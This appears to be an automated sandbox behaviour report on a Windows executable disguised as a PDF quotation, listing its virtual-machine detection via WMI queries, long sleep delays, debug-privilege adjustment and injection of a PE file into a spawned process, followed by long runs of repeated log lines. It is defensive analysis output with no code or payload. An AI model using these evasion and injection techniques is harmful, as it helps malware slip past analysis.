Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe TID: 5896	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe TID: 2280	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe TID: 3764	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe TID: 1468	Thread sleep count: 5150 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe TID: 4352	Thread sleep count: 3528 > 30	Jump to behavior

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Window / User API: threadDelayed 5150			Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Window / User API: threadDelayed 3528			Jump to behavior

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: Quotation-pdf______________________________________.exe, 00000000.00000003.268519442.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: DvmcikoVp0QoH6OuVpr
Source: Quotation-pdf______________________________________.exe, 00000000.00000002.275849199.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000004.00000002.494764319.0000000000B73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe

Code function: 4_2_05F34800 LdrInitializeThunk,

4_2_05F34800

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe

Memory written: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe

Process created: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe C:\Users\user\Desktop\Quotation-pdf______________________________________.exe

Jump to behavior

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
